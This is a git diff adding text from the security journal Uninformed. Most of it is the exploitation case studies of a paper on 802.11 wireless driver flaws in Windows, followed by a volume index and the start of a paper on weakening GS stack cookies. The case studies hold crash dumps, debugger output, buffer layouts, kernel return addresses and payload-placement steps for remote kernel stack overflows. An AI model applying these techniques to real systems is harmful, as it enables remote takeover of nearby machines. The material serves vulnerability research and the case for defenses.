4d 01 02 50 51 52 53 54-55 56 57 58 59 5a 5b 5c M..PQRSTUVWXYZ[\ +805500e8 5d 5e 5f 60 61 62 63 64-65 66 67 68 69 6a 6b 6c ]^_`abcdefghijkl +805500f8 6d 6e 6f 70 71 72 73 74-75 76 77 78 79 7a 7b 7c mnopqrstuvwxyz{| +80550108 7d 7e 7f 80 81 82 83 84-85 86 87 88 89 8a 8b 8c }~.............. +80550118 8d 8e 8f 90 91 92 93 94-95 96 97 98 99 9a 9b 9c ................ +80550128 9d 9e 9f a0 a1 a2 a3 a4-a5 a6 a7 a8 a9 aa ab ac ................ +80550138 ad ae af b0 b1 b2 b3 b4-b5 b6 b7 b8 b9 ba bb bc ................ +80550148 bd be bf c0 c1 c2 c3 c4-c5 c6 c7 c8 c9 ca cb cc ................ +80550158 cd ce cf d0 d1 d2 d3 d4-d5 d6 d7 d8 d9 da db dc ................ +80550168 dd de df e0 e1 e2 e3 e4-e5 e6 e7 e8 e9 ea eb ec ................ +80550178 ed ee ef f0 f1 f2 f3 f4-f5 f6 f7 f8 f9 fa fb fc ................ +80550188 fd fe e9 84 00 00 00 00-e0 9e 6a 01 ac 01 55 80 ..........j...U. + +Based on this dump, it appears that the majority of the SSID was indeed copied +across the stack. However, a large portion of the buffer prior to the offset +of the return address has been mangled. In this instance, the return address +appears to be located at 0x805500e4. While the area prior to this address +appears mangled, the area succeeding it has remained intact. + +In order to try to prove the possibility of gaining code execution, a good +initial attempt would be to send a buffer that overwrites the return address +with the address that immediately succeeds it (which will be composed of +int3's). If everything works according to plan, the vulnerable function will +return into the int3's and bluescreen the machine in a controlled fashion. +This accomplishes two things. First, it proves that it is possible to +redirect execution into a controllable buffer. Second, it gives a snapshot of +the state of the registers at the time that execution control is redirected. +The layout of the buffer that would need to be sent to trigger this condition +is described in the diagram below: + +[Padding.......][EIP][payload of int3's] + ^ ^ ^ + | | \_ Can hold at most 163 bytes of arbitrary code. + | \_ Overwritten with 0x8055010d which points to the payload + \_ Start of SSID that is mangled after the overflow occurs. + +Transmitting a buffer that is structured as shown above does indeed result in +a bluescreen. It is possible to differentiate actual crashes from those +generated as the result of an int3 by looking at the bugcheck information. +The use of an int3 will result in an unhandled kernel mode exception which is +bugcheck code 0x8e. Furthermore, the exception code information associated +with this (the first parameter of the exception) will be set to 0x80000003. +Exception code 0x80000003 is used to indicate that the unhandled exception was +associated with a trap instruction. This is generally a good indication that +the arbitrary code you specified has executed. It's also very useful in +situations where it is not possible to do remote kernel debugging and one must +rely on strictly using crash dump analysis. + +KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e) +This is a very common bugcheck. Usually the exception address pinpoints +the driver/function that caused the problem. Always note this address +as well as the link date of the driver/image that contains this address. +Some common problems are exception code 0x80000003. This means a hard +coded breakpoint or assertion was hit, but this system was booted +/NODEBUG. This is not supposed to happen as developers should never have +hardcoded breakpoints in retail code, but ... +If this happens, make sure a debugger gets connected, and the +system is booted /DEBUG. This will let us see why this breakpoint is +happening. +Arguments: +Arg1: 80000003, The exception code that was not handled +Arg2: 8055010d, The address that the exception occurred at +Arg3: 80550088, Trap Frame +Arg4: 00000000 +... +TRAP_FRAME: 80550088 -- (.trap ffffffff80550088) +ErrCode = 00000000 +eax=8055010d ebx=841b0000 ecx=00000000 edx=841b31f4 esi=841b000c edi=845f302e +eip=8055010e esp=805500fc ebp=8055010d iopl=0 nv up ei pl zr na pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246 +nt!KiDoubleFaultStack+0x2c8e: +8055010e cc int 3 +... +STACK_TEXT: +8054fc50 8051d6a7 0000008e 80000003 8055010d nt!KeBugCheckEx+0x1b +80550018 804df235 80550034 00000000 80550088 nt!KiDispatchException+0x3b1 +80550080 804df947 8055010d 8055010e badb0d00 nt!CommonDispatchException+0x4d +80550080 8055010e 8055010d 8055010e badb0d00 nt!KiTrap03+0xad +8055010d cccccccc cccccccc cccccccc cccccccc nt!KiDoubleFaultStack+0x2c8e +WARNING: Frame IP not in any known module. Following frames may be wrong. +80550111 cccccccc cccccccc cccccccc cccccccc 0xcccccccc +80550115 cccccccc cccccccc cccccccc cccccccc 0xcccccccc +80550119 cccccccc cccccccc cccccccc cccccccc 0xcccccccc +8055011d cccccccc cccccccc cccccccc cccccccc 0xcccccccc + +The above crash dump information definitely shows that arbitrary code +execution has been achieved. This is a big milestone. It pretty much proves +that exploitation will be possible. However, it doesn't prove how reliable or +portable it will be. For that reason, the next step involves identifying +changes to the exploit that will make it more reliable and portable from one +machine to the next. Fortunately, the current situation already appears like +it might afford a good degree of portability, as the stack addresses don't +appear to shift around from one crash to the next. + +At this stage, the return address is being overwritten with a hard-coded stack +address that points immediately after the return address in the buffer. One +of the problems with this is that the amount of space immediately following +the return address is limited to 163 bytes due to the maximum size of the SSID +IE. This is enough room for small stub of a payload, but probably not large +enough for a payload that would provide anything interesting in terms of +features. It's also worth noting that overwriting past the return address +might overwrite some important elements on the stack that could lead to the +system crashing at some later point for hard to explain reasons. When dealing +with kernel-mode vulnerabilities, it is advised that one attempt to clobber +the least amount of state as possible in order to reduce the amount of collateral +damage that might ensue. + +Limiting the amount of data that is used in the overflow to only the amount +needed to trigger the overwriting of the return address means that the total +size for the SSID IE will be limited and not suitable to hold arbitrary code. +However, there's no reason why code couldn't be placed in a completely +separate IE unrelated to the SSID. This means we could transmit a packet that +included both the bogus SSID IE and another arbitrary IE which would be used +to contain the arbitrary code. Although this would work, it must be possible +to find a reference to the arbitrary IE that contains the arbitrary code. One +approach that might be taken to do this would be to search the address space +for an intact copy of the 802.11 packet that is transmitted. Before going +down that path, it makes sense to try to find instances of the packet in +memory using the kernel debugger. A simple search of the address space using +the destination MAC address of the packet sent is a good way to find potential +matches. In this case, the destination MAC is 00:14:a5:06:8f:e6. + +kd> .ignore_missing_pages 1 +Suppress kernel summary dump missing page error message +kd> s 0x80000000 L?10000000 00 14 a5 06 8f e6 +8418588a 00 14 a5 06 8f e6 ff ff-ff ff ff ff 40 0e 00 00 ............@... +841b0006 00 14 a5 06 8f e6 00 00-00 00 00 00 00 00 00 00 ................ +841b1534 00 14 a5 06 8f e6 00 00-00 00 00 00 00 00 00 00 ................ +84223028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ +845dc028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ +845de828 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ +845df828 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ +845f3028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ +845f3828 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ +845f4028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ +845f5028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ +84642d4c 00 14 a5 06 8f e6 00 00-f0 c6 2a 85 00 00 00 00 ..........*..... +846d6d4c 00 14 a5 06 8f e6 00 00-80 79 21 85 00 00 00 00 .........y!..... +84eda06c 00 14 a5 06 8f e6 02 06-01 01 00 0e 00 00 00 00 ................ +84efdecc 00 14 a5 06 8f e6 00 00-65 00 00 00 16 00 25 0a ........e.....%. + +The above output shows that quite a few matches were found One important thing +to note is that the BSSID used in the packet that contained the overly sized +SSID was 00:07:0e:01:02:03. In an 802.11 header, the addresses of Management +packets are arranged in order of DST, SRC, BSSID. While some of the above +matches do not appear to contain the entire packet contents, many of them do. +Picking one of the matches at random shows the contents in more detail: + +kd> db 84223028 L 128 +84223028 00 14 a5 06 8f e6 00 07-0e 01 02 03 00 07 0e 01 ................ +84223038 02 03 d0 cf 85 b1 b3 db-01 00 00 00 64 00 11 04 ............d... +84223048 00 ff 4a 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d ..J..U...U...U.. +84223058 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U.. +84223068 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U.. +84223078 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U.. +84223088 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U.. +84223098 01 55 80 0d 01 55 80 0d-01 55 80 0d 01 55 80 0d .U...U...U...U.. +842230a8 01 55 80 cc cc cc cc cc-cc cc cc cc cc cc cc cc .U.............. +842230b8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................ +842230c8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................ +842230d8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................ +842230e8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................ +842230f8 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................ +84223108 cc cc cc cc cc cc cc cc-cc cc cc cc cc cc cc cc ................ + +Indeed, this does appear to be a full copy of the original packet. The reason +why there are so many copies of the packet in memory might be related to the +fact that the current form of the exploit is transmitting packets in an +infinite loop, thus causing the driver to have a few copies lingering in +memory. The fact that multiple copies exist in memory is good news +considering it increases the number of places that could be used for return +addresses. However, it's not as simple as hard-coding one of these addresses +into the exploit considering pool allocated addresses will not be predictable. +Instead, steps will need to be taken to attempt to find a reference to the +packet through a register or through some other context. In this way, a very +small stub could be placed after the return address in the buffer that would +immediately transfer control into the a copy of the packet somewhere else in +memory. Although some initial work with the debugger showed a couple of +references to the original packet on the stack, a much simpler solution was +identified. Consider the following register context at the time of the crash: + +kd> r +Last set context: +eax=8055010d ebx=841b0000 ecx=00000000 edx=841b31f4 esi=841b000c edi=845f302e +eip=8055010e esp=805500fc ebp=8055010d iopl=0 nv up ei pl zr na pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246 +nt!KiDoubleFaultStack+0x2c8e: +8055010e cc int 3 + +Inspecting each of these registers individually eventually shows that the edi +register is pointing into a copy of the packet. + +kd> db edi +845f302e 00 07 0e 01 02 03 00 07-0e 01 02 03 10 cf 85 b1 ................ +845f303e b3 db 01 00 00 00 64 00-11 04 00 ff 4a 0d 01 55 ......d.....J..U +845f304e 80 0d 01 55 80 0d 01 55-80 0d 01 55 80 0d 01 55 ...U...U...U...U + +As chance would have it, edi is pointing to the source MAC in the 802.11 +packet that was sent. If it had instead been pointing to the destination MAC +or the end of the packet, it would not have been of any use. With edi being +pointed to the source MAC, the rest of the cards fall into place. The +hard-coded stack address that was previously used to overwrite the return +address can be replaced with an address (probably inside ntoskrnl.exe) that +contains the equivalent of a jmp edi instruction. When the exploit is +triggered and the vulnerable function returns, it will transfer control to the +location that contains the jmp edi. The jmp edi, in turn, transfers control +to the first byte of the source MAC. By setting the source MAC to some +executable code, such as a relative jump instruction, it is possible to +finally transfer control into a location of the packet that contains the +arbitrary code that should be executed. + +This solves the problem of using the hard-coded stack address as the return +address and should help to make the exploit more reliable and portable between +targets. However, this portability will be limited by the location of the jmp +edi instruction that is used when overwriting the return address. Finding the +location of a jmp edi instruction is relatively simple, although more +effective measures could be use to cross-reference addresses in an effort to +find something more portable Experimentation shows that 0x8066662c is a +reliable location: + +kd> s nt L?10000000 ff e7 +8063abce ff e7 ff 21 47 70 21 83-98 03 00 00 eb 38 80 3d ...!Gp!......8.= +806590ca ff e7 ff 5f eb 05 bb 22-00 00 c0 8b ce e8 74 ff ..._..."......t. +806590d9 ff e7 ff 5e 8b c3 5b c9-c2 08 00 cc cc cc cc cc ...^..[......... +8066662c ff e7 ff 8b d8 85 db 74-e0 33 d2 42 8b cb e8 d7 .......t.3.B.... +806bb44b ff e7 a3 6c ff a2 42 08-ff 3f 2a 1e f0 04 04 04 ...l..B..?*..... +... + +With the exploit all but finished, the final question that remains unanswered +is where the arbitrary code should be placed in the 802.11 packet. There are +a few different ways that this could be tackled. The simplest solution to the +problem would be to simply append the arbitrary code immediately after the +SSID in the packet. However, this would make the packet malformed and might +cause the driver to drop it. Alternatively, an arbitrary IE, such as a WPA +IE, could be used as a container for the arbitrary code as suggested earlier +in this section. For now, the authors decided to take the middle road. By +default, a WPA IE will be used as the container for all payloads, regardless +of whether or not the payloads fit within the IE. This has the effect of +allowing all payloads smaller than 256 bytes to be part of a well-formed +packet. Payloads that are larger than 255 bytes will cause the packet to be +malformed, but perhaps not enough to cause the driver to drop the packet. An +alternate solution to this issue can be found in the NetGear case study. + +At this point, the structure of the buffer and the packet as a whole have been +completely researched and are ready to be tested. The only thing left to do +is incorporate the arbitrary code that was described in 4.1. Much time was +spent debugging and improving the code that was used in order to produce a +reliable exploit. + +5.2) D-Link + +Soon after the Broadcom exploit was completed, the authors decided to write a +suite of fuzzing modules that could discover similar issues in other wireless +drivers. The first casualty of this process was the A5AGU.SYS driver provided +with the D-Link's DWL-G132 USB wireless adapter. The authors configured the +test machine (Windows XP SP2) so that a complete snapshot of kernel memory was +included in the system crash dumps. This ensures that when a crash occurs, +enough useful information is there to debug the problem. Next, the latest +driver for the target device (v1.0.1.41) was installed. Finally, the beacon +fuzzing module was started and the card was inserted into the USB port of the +test system. Five seconds later, a beautiful blue screen appeared while the +crash dump was written to disk. + +DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) +An attempt was made to access a pageable (or completely invalid) address at an +interrupt request level (IRQL) that is too high. This is usually +caused by drivers using improper addresses. +If kernel debugger is available get stack backtrace. +Arguments: +Arg1: 56149a1b, memory referenced +Arg2: 00000002, IRQL +Arg3: 00000000, value 0 = read operation, 1 = write operation +Arg4: 56149a1b, address which referenced memory + +ErrCode = 00000000 +eax=00000000 ebx=82103ce0 ecx=00000002 edx=82864dd0 esi=f24105dc edi=8263b7a6 +eip=56149a1b esp=80550658 ebp=82015000 iopl=0 nv up ei ng nz ac pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010296 +56149a1b ?? ??? +Resetting default scope + +LAST_CONTROL_TRANSFER: from 56149a1b to 804e2158 + +FAILED_INSTRUCTION_ADDRESS: ++56149a1b +56149a1b ?? ??? + +STACK_TEXT: +805505e4 56149a1b badb0d00 82864dd0 00000000 nt!KiTrap0E+0x233 +80550654 82015000 82103ce0 81f15e10 8263b79c 0x56149a1b +80550664 f2408d54 81f15e10 82103c00 82015000 0x82015000 +80550694 f24019cc 82015000 82103ce0 82015000 A5AGU+0x28d54 +805506b8 f2413540 824ff008 0000000b 82015000 A5AGU+0x219cc +805506d8 f2414fae 824ff008 0000000b 0000000c A5AGU+0x33540 +805506f4 f24146ae f241d328 8263b760 81f75000 A5AGU+0x34fae +80550704 f2417197 824ff008 00000001 8263b760 A5AGU+0x346ae +80550728 804e42cc 00000000 821f0008 00000000 A5AGU+0x37197 +80550758 f74acee5 821f0008 822650a8 829fb028 nt!IopfCompleteRequest+0xa2 +805507c0 f74adb57 8295a258 00000000 829fb7d8 USBPORT!USBPORT_CompleteTransfer+0x373 +805507f0 f74ae754 026e6f44 829fb0e0 829fb0e0 USBPORT!USBPORT_DoneTransfer+0x137 +80550828 f74aff6a 829fb028 804e3579 829fb230 USBPORT!USBPORT_FlushDoneTransferList+0x16c +80550854 f74bdfb0 829fb028 804e3579 829fb028 USBPORT!USBPORT_DpcWorker+0x224 +80550890 f74be128 829fb028 00000001 80559580 USBPORT!USBPORT_IsrDpcWorker+0x37e +805508ac 804dc179 829fb64c 6b755044 00000000 USBPORT!USBPORT_IsrDpc+0x166 +805508d0 804dc0ed 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 +805508d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 + +Five seconds of fuzzing had produced a flaw that made it possible to gain +control of the instruction pointer. In order to execute arbitrary code, +however, a contextual reference to the malicious frame had to be located. In +this case, the edi register pointed into the source address field of the frame +in just the same way that it did in the Broadcom vulnerability. The bogus eip +value can be found just past the source address where one would expect it -- +inside one of the randomly generated information elements. + +kd> dd 0x8263b7a6 (edi) +8263b7a6 f3793ee8 3ee8a34e a34ef379 6eb215f0 +8263b7b6 fde19019 006431d8 9b001740 63594364 + +kd> s 0x8263b7a6 Lffff 0x1b 0x9a 0x14 0x56 +8263bd2b 1b 9a 14 56 2a 85 56 63-00 55 0c 0f 63 6e 17 51 ...V*.Vc.U..cn.Q + +The next step was to determine what information element was causing the crash. +After decoding the in-memory version of the frame, a series of modifications +and retransmissions were made until the specific information element leading +to the crash was found. Through this method it was determined that a long +Supported Rates information element triggers the stack overflow shown in the +crash above. + +Exploiting this flaw involved finding a return address in memory that pointed +to a jmp edi, call edi, or push edi; ret instruction sequence. This was +accomplished by running the msfpescan application included with the Metasploit +Framework against the ntoskrnl.exe of our target. The resulting addresses had +to be adjusted to account for the kernel's base address. The address that was +chosen for this version of ntoskrnl.exe was 0x804f16eb ( 0x800d7000 + +0x0041a6eb ). + +$ msfpescan ntoskrnl.exe -j edi +[ntoskrnl.exe] +0x0040365d push edi; retn 0x0001 +0x00405aab call edi +0x00409d56 push edi; ret +0x0041a6eb jmp edi + +Finally, the magic frame was reworked into an exploit module for the 3.0 +version of the Metasploit Framework. When the exploit is launched, a stack +overflow occurs, the return address is overwritten with the location of a jmp +edi, which in turn lands on the source address of the frame. The source +address was modified to be a valid x86 relative jump, which directs execution +into the body of the first information element. The maximum MTU of 802.11b is +over 2300 bytes, allowing for payloads of up to 1000 bytes without running +into reliability issues. Since this exploit is sent to the broadcast address, +all vulnerable clients within range of the attacker are exploited with a +single frame. + +5.3) NetGear + +For the next test, the authors chose NetGear's WG111v2 USB wireless adapter. +The machine used in the D-Link exploit was reused for this test (Windows XP +SP2). The latest version of the WG111v2.SYS driver (v5.1213.6.316) was +installed, the beacon fuzzer was started, and the adapter was connected to the +test system. After about ten seconds, the system crashed and another gorgeous +blue screen appeared. + +DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1) +An attempt was made to access a pageable (or completely invalid) address at an +interrupt request level (IRQL) that is too high. This is usually +caused by drivers using improper addresses. +If kernel debugger is available get stack backtrace. +Arguments: +Arg1: dfa6e83c, memory referenced +Arg2: 00000002, IRQL +Arg3: 00000000, value 0 = read operation, 1 = write operation +Arg4: dfa6e83c, address which referenced memory + +ErrCode = 00000000 +eax=80550000 ebx=825c700c ecx=00000005 edx=f30e0000 esi=82615000 edi=825c7012 +eip=dfa6e83c esp=80550684 ebp=b90ddf78 iopl=0 nv up ei pl zr na pe nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 +dfa6e83c ?? ??? +Resetting default scope + +LAST_CONTROL_TRANSFER: from dfa6e83c to 804e2158 + +FAILED_INSTRUCTION_ADDRESS: ++ffffffffdfa6e83c +dfa6e83c ?? ??? + +STACK_TEXT: +80550610 dfa6e83c badb0d00 f30e0000 0b9e1a2b nt!KiTrap0E+0x233 +WARNING: Frame IP not in any known module. Following frames may be wrong. +80550680 79e1538d 14c4f76f 8c1cec8e ea20f5b9 0xdfa6e83c +80550684 14c4f76f 8c1cec8e ea20f5b9 63a92305 0x79e1538d +80550688 8c1cec8e ea20f5b9 63a92305 115cab0c 0x14c4f76f +8055068c ea20f5b9 63a92305 115cab0c c63e58cc 0x8c1cec8e +80550690 63a92305 115cab0c c63e58cc 6d90e221 0xea20f5b9 +80550694 115cab0c c63e58cc 6d90e221 78d94283 0x63a92305 +80550698 c63e58cc 6d90e221 78d94283 2b828309 0x115cab0c +8055069c 6d90e221 78d94283 2b828309 39d51a89 0xc63e58cc +805506a0 78d94283 2b828309 39d51a89 0f8524ea 0x6d90e221 +805506a4 2b828309 39d51a89 0f8524ea c8f0583a 0x78d94283 +805506a8 39d51a89 0f8524ea c8f0583a 7e98cd49 0x2b828309 +805506ac 0f8524ea c8f0583a 7e98cd49 214b52ab 0x39d51a89 +805506b0 c8f0583a 7e98cd49 214b52ab 139ef137 0xf8524ea +805506b4 7e98cd49 214b52ab 139ef137 a7693fa7 0xc8f0583a +805506b8 214b52ab 139ef137 a7693fa7 dfad502f 0x7e98cd49 +805506bc 139ef137 a7693fa7 dfad502f 81212de6 0x214b52ab +805506c0 a7693fa7 dfad502f 81212de6 c46a3b2e 0x139ef137 +805507c0 f74a1b57 825f1e40 00000000 829a87d8 0xa7693fa7 +805507f0 f74a2754 026e6f44 829a80e0 829a80e0 USBPORT!USBPORT_DoneTransfer+0x137 +80550828 f74a3f6a 829a8028 804e3579 829a8230 USBPORT!USBPORT_FlushDoneTransferList+0x16c +80550854 f74b1fb0 829a8028 804e3579 829a8028 USBPORT!USBPORT_DpcWorker+0x224 +80550890 f74b2128 829a8028 00000001 80559580 USBPORT!USBPORT_IsrDpcWorker+0x37e +805508ac 804dc179 829a864c 6b755044 00000000 USBPORT!USBPORT_IsrDpc+0x166 +805508d0 804dc0ed 00000000 0000000e 00000000 nt!KiRetireDpcList+0x46 +805508d4 00000000 0000000e 00000000 00000000 nt!KiIdleLoop+0x26 + +The crash indicates that not only did the fuzzer gain control of the driver's +execution address, but the entire stack frame was smashed as well. The esp +register points about a thousand bytes into the frame and the bogus eip value +inside another controlled area. + +kd> dd 80550684 +80550684 79e1538d 14c4f76f 8c1cec8e ea20f5b9 +80550694 63a92305 115cab0c c63e58cc 6d90e221 + +kd> s 0x80550600 Lffff 0x3c 0xe8 0xa6 0xdf +80550608 3c e8 a6 df 10 06 55 80-78 df 0d b9 3c e8 a6 df <.....U.x...<... +80550614 3c e8 a6 df 00 0d db ba-00 00 0e f3 2b 1a 9e 0b <...........+... +80550678 3c e8 a6 df 08 00 00 00-46 02 01 00 8d 53 e1 79 <.......F....S.y +8055a524 3c e8 a6 df 02 00 00 00-00 00 00 00 3c e8 a6 df <...........<... +8055a530 3c e8 a6 df 00 40 00 e1-00 00 00 00 00 00 00 00 <....@.......... + +Analyzing this bug took a lot more time than one might expect. Suprisingly, +there is no single field or information element that triggers this flaw. Any +series of information elements with a length greater than 1100 bytes will +trigger the overflow if the SSID, Supported Rates, and Channel information +elements are at the beginning. The driver will discard any frames where the IE +chain is truncated or extends beyond the boundaries of the received frame. +This was an annoyance, since a payload may be of arbitrary length and content +and may not neatly fit into a 255 byte block of data (the maximum for a single +IE). The solution was to treat the blob of padding and shellcode like a +contiguous IE chain and pad the buffer based on the content and length of the +frame. The exploit code would generate the buffer, then walk through the +buffer as if it was a series of IEs, extending the very last IE via randomized +padding. This results in a chain of garbage information elements which pass +the driver's sanity checks and allows for clean exploitation. + +For this bug, the esp register was the only one pointing into controlled data. +This introduced another problem -- before the vulnerable function returned, it +modified stack variables and left parts of the frame corrupted. Although the +area pointed to by esp was stable, a corrupted block exists just beyond it. To +solve this, a tiny block of assembly code was added to the exploit that, when +executed, would jump to the real payload by calculating an offset from the eax +register. Finding a jmp esp instruction was as simple as running msfpescan on +ntoskrnl.exe and adjusting it for the kernel base address. The address that +was chosen for this version of ntoskrnl.exe was 0x804ed5cb (0x800d7000 + +0x004165cb). + +$ msfpescan ntoskrnl.exe -j esp +[ntoskrnl.exe] +0x004165cb jmp esp + +6) Conclusion + +Technology that can be used to help prevent the exploitation of user-mode +vulnerabilities is now becoming common place on modern desktop platforms. +This represents a marked improvement that should, in the long run, make the +exploitation of many user-mode vulnerabilities much more difficult or even +impossible. That being said, there is an apparent lack of equivalent +technology that can help to prevent the exploitation of kernel-mode +vulnerabilities. The public justification for the lack of equivalent +technology typically centers around the argument that kernel-mode +vulnerabilities are difficult to exploit and are too few in number to actually +warrant the integration of exploit prevention features. In actuality, sad +though it may seem, the justification really boils down to a business cost +issue. At present, kernel-mode vulnerabilities don't account for enough money +in lost revenue to support the time investment needed to implement and test +kernel-mode exploit prevention features. + +In the interest of helping to balance the business cost equation, the authors +have described a process that can be used to identify and exploit 802.11 +wireless device driver vulnerabilities on Windows. This process includes +steps that can be taken to fuzz the different ways in which 802.11 device +drivers process 802.11 packets. In certain cases, flaws may be detected in a +particular device driver's processing of certain packets, such as Beacon +requests and Probe responses. When these flaws are detected, exploits can be +developed using the features that have been integrated into the 3.0 version of +the Metasploit Framework that help to streamline the process of transmitting +crafted 802.11 packets in an effort to gain code execution. + +Through the description of this process, it is hoped that the reader will see +that kernel-mode vulnerabilities can be just as easy to identify and exploit +as user-mode. Furthermore, it is hoped that this description will help to +eliminate the false impression that all kernel-mode vulnerabilities are much +more difficult to exploit (keeping in mind, of course, that there are indeed +kernel-mode vulnerabilities that are difficult to exploit in just the same way +that there are indeed user-mode vulnerabilities that are difficult to +exploit). While an emphasis has been put upon 802.11 wireless device drivers, +many different device drivers have the potential for exposing vulnerabilities. +Looking toward the future, there are many different opportunities for +research, both from an attack and defense point of view. + +From an attack point of view, there's no shortage of interesting research +topics. As it relates to 802.11 wireless device driver vulnerabilities, much +more advanced 802.11 protocol fuzzers can be developed that are capable of +reaching features exposed by all of the protocol client states rather than +focusing on the unauthenticated and unassociated state. For device drivers in +general, the development of fuzzers that attack the IOCTL interface exposed by +device objects would provide good insight into a wide range of locally exposed +vulnerabilities. Aside from techniques used to identify vulnerabilities, it's +expected that researching of techniques used to actually take advantage of +different types of kernel-mode vulnerabilities will continue to evolve and +become more reliable. From a defense point of view, there is a definite need +for research that is focused on making the exploitation of kernel-mode +vulnerabilities either impossible or less reliable. It will be interesting to +see what the future holds for kernel-mode vulnerabilities. + +Bibliography + +[1] bugcheck and skape. Windows Kernel-mode Payload Fundamentals. + http://www.uninformed.org/?v=3&a=4&t=sumry; + accessed Dec 2, 2006. + +[2] eEye. Remote Windows Kernel Exploitation - Step Into the Ring 0. + http://research.eeye.com/html/Papers/download/StepIntoTheRing.pdf; + accessed Dec 2, 2006. + +[3] Gast, Matthew S. 802.11 Wireless Networks - The Definitive Guide. + http://www.oreilly.com/catalog/802dot11/; + accessed Dec 2, 2006. + +[4] Lemos, Robert. Device drivers filled with flaws, threaten security. + http://www.securityfocus.com/news/11189; + accessed Dec 2, 2006. + +[5] SoBeIt. Windows Kernel Pool Overflow Exploitation. + http://xcon.xfocus.org/xcon2005/archives/2005/Xcon2005_SoBeIt.pdf; + accessed Dec 2, 2006. diff --git a/uninformed/6.txt b/uninformed/6.txt new file mode 100644 index 0000000..ec90511 --- /dev/null +++ b/uninformed/6.txt @@ -0,0 +1,17 @@ +Engineering in Reverse +Subverting PatchGuard Version 2 +Skywing +Windows Vista x64 and recently hotfixed versions of the Windows Server 2003 x64 kernel contain an updated version of Microsoft's kernel-mode patch prevention technology known as PatchGuard. This new version of PatchGuard improves on the previous version in several ways, primarily dealing with attempts to increase the difficulty of bypassing PatchGuard from the perspective of an independent software vendor (ISV) deploying a driver that patches the kernel. The feature-set of PatchGuard version 2 is otherwise quite similar to PatchGuard version 1; the SSDT, IDT/GDT, various MSRs, and several kernel global function pointer variables (as well as kernel code) are guarded against unauthorized modification. This paper proposes several methods that can be used to bypass PatchGuard version 2 completely. Potential solutions to these bypass techniques are also suggested. Additionally, this paper describes a mechanism by which PatchGuard version 2 can be subverted to run custom code in place of PatchGuard's system integrity checking code, all while leaving no traces of any kernel patching or custom kernel drivers loaded in the system after PatchGuard has been subverted. This is particularly interesting from the perspective of using PatchGuard's defenses to hide kernel mode code, a goal that is (in many respects) completely contrary to what PatchGuard is designed to do. +pdf | txt | code.tgz | html + +Locreate: An Anagram for Relocate +skape +This paper presents a proof of concept executable packer that does not use any custom code to unpack binaries at execution time. This is different from typical packers which generally rely on packed executables containing code that is used to perform the inverse of the packing operation at runtime. Instead of depending on custom code, the technique described in this paper uses documented behavior of the dynamic loader as a mechanism for performing the unpacking operation. This difference can make binaries packed using this technique more difficult to signature and analyze, but only when presented to an untrained eye. The description of this technique is meant to be an example of a fun thought exercise and not as some sort of revolutionary packer. In fact, it's been used in the virus world many years prior to this paper. +pdf | txt | code.tgz | html + +Exploitation Technology +Exploiting 802.11 Wireless Driver Vulnerabilities on Windows +Johnny Cache, H D Moore, skape +This paper describes the process of identifying and exploiting 802.11 wireless device driver vulnerabilities on Windows. This process is described in terms of two steps: pre-exploitation and exploitation. The pre-exploitation step provides a basic introduction to the 802.11 protocol along with a description of the tools and libraries the authors used to create a basic 802.11 protocol fuzzer. The exploitation step describes the common elements of an 802.11 wireless device driver exploit. These elements include things like the underlying payload architecture that is used when executing arbitrary code in kernel-mode on Windows, how this payload architecture has been integrated into the 3.0 version of the Metasploit Framework, and the interface that the Metasploit Framework exposes to make developing 802.11 wireless device driver exploits easy. Finally, three separate real world wireless device driver vulnerabilities are used as case studies to illustrate the application of this process. It is hoped that the description and illustration of this process can be used to show that kernel-mode vulnerabilities can be just as dangerous and just as easy to exploit as user-mode vulnerabilities. In so doing, awareness of the need for more robust kernel-mode exploit prevention technology can be raised. +pdf | txt | code.tgz | html + diff --git a/uninformed/7.1.txt b/uninformed/7.1.txt new file mode 100644 index 0000000..b755c7c --- /dev/null +++ b/uninformed/7.1.txt @@ -0,0 +1,958 @@ +Reducing the Effective Entropy of GS Cookies +skape +mmiller@hick.org +3/2007 + +1) Foreword + +Abstract: This paper describes a technique that can be used to reduce the +effective entropy in a given GS cookie by roughly 15 bits. This reduction is +made possible because GS uses a number of weak entropy sources that can, with +varying degrees of accuracy, be calculated by an attacker. It is important to +note, however, that the ability to calculate the values of these sources for +an arbitrary cookie currently relies on an attacker having local access to the +machine, such as through the local console or through terminal services. This +effectively limits the use of this technique to stack-based local privilege +escalation vulnerabilities. In addition to the general entropy reduction +technique, this paper discusses the amount of effective entropy that exists in +services that automatically start during system boot. It is hypothesized that +these services may have more predictable states of entropy due to the relative +consistency of the boot process. While the techniques described in this paper +do not illustrate a complete break of GS, any inherent weakness can have +disastrous consequences given that GS is a static, compile-time security +solution. It is not possible to simply distribute a patch. Instead, +applications must be recompiled to take advantage of any security +improvements. In that vein, the 